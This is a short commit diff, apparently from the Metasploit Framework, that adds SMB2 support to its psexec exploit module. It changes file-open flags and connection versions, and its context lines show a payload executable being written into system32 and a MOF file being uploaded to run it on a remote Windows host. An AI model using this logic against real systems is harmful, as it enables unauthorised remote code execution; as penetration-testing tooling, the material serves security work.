psexec smb2 support

2018-06-18 13:16:25 -05:00 · 2018-06-18 13:16:25 -05:00 · 2fd0d797ac
parent bd77273dc0
commit 2fd0d797ac
4 changed files with 9 additions and 7 deletions
--- a/lib/msf/core/exploit/smb/client.rb
+++ b/lib/msf/core/exploit/smb/client.rb
@ -166,8 +166,8 @@ module Msf
      #the default chunk size of 48000 for OpenFile is not compatible when signing is enabled (and with some nt4 implementations)
      #cause it looks like MS windows refuse to sign big packet and send STATUS_ACCESS_DENIED
      #fd.chunk_size = 500 is better
-      def smb_open(path, perm)
-        self.simple.open(path, perm, datastore['SMB::ChunkSize'])
+      def smb_open(path, perm, read: true, write: false)
+        self.simple.open(path, perm, datastore['SMB::ChunkSize'], read: read, write: write)
      end

      def smb_hostname
--- a/lib/msf/core/exploit/smb/client/psexec.rb
+++ b/lib/msf/core/exploit/smb/client/psexec.rb
@ -288,11 +288,11 @@ module Exploit::Remote::SMB::Client::Psexec
      smbshare = folder_list[0]
      fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
      simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
-      fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
+      fd = smb_open("#{fileprefix}\\#{filename}", 'rwct', write: true)
    else
      subfolder = false
      simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
-      fd = smb_open("\\#{filename}", 'rwct')
+      fd = smb_open("#{filename}", 'rwct', write: true)
    end
    exe = ''
    opts = { :servicename => service_name, :serviceencoder => serviceencoder}
@ -358,7 +358,7 @@ module Exploit::Remote::SMB::Client::Psexec
    end
    simple.connect(share)
    exe = generate_payload_exe
-    fd = smb_open("\\system32\\#{filename}", 'rwct')
+    fd = smb_open("\\system32\\#{filename}", 'rwct', write: true)
    fd << exe
    fd.close
    print_status("Created %SystemRoot%\\system32\\#{filename}")
@ -367,7 +367,7 @@ module Exploit::Remote::SMB::Client::Psexec
    mofname = rand_text_alphanumeric(14) + ".MOF"
    mof = generate_mof(mofname, filename)
    print_status("Uploading MOF...")
-    fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
+    fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct', write: true)
    fd << mof
    fd.close
    print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
--- a/lib/rex/proto/dcerpc/client.rb
+++ b/lib/rex/proto/dcerpc/client.rb
@ -296,6 +296,8 @@ require 'rex/proto/smb/exceptions'

    raw_response = ''

+    sleep 3
+
    begin
      raw_response = self.read()
    rescue ::EOFError
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote

  def exploit
    print_status("Connecting to the server...")
-    connect()
+    connect(versions: [1,2])

    print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
    smb_login()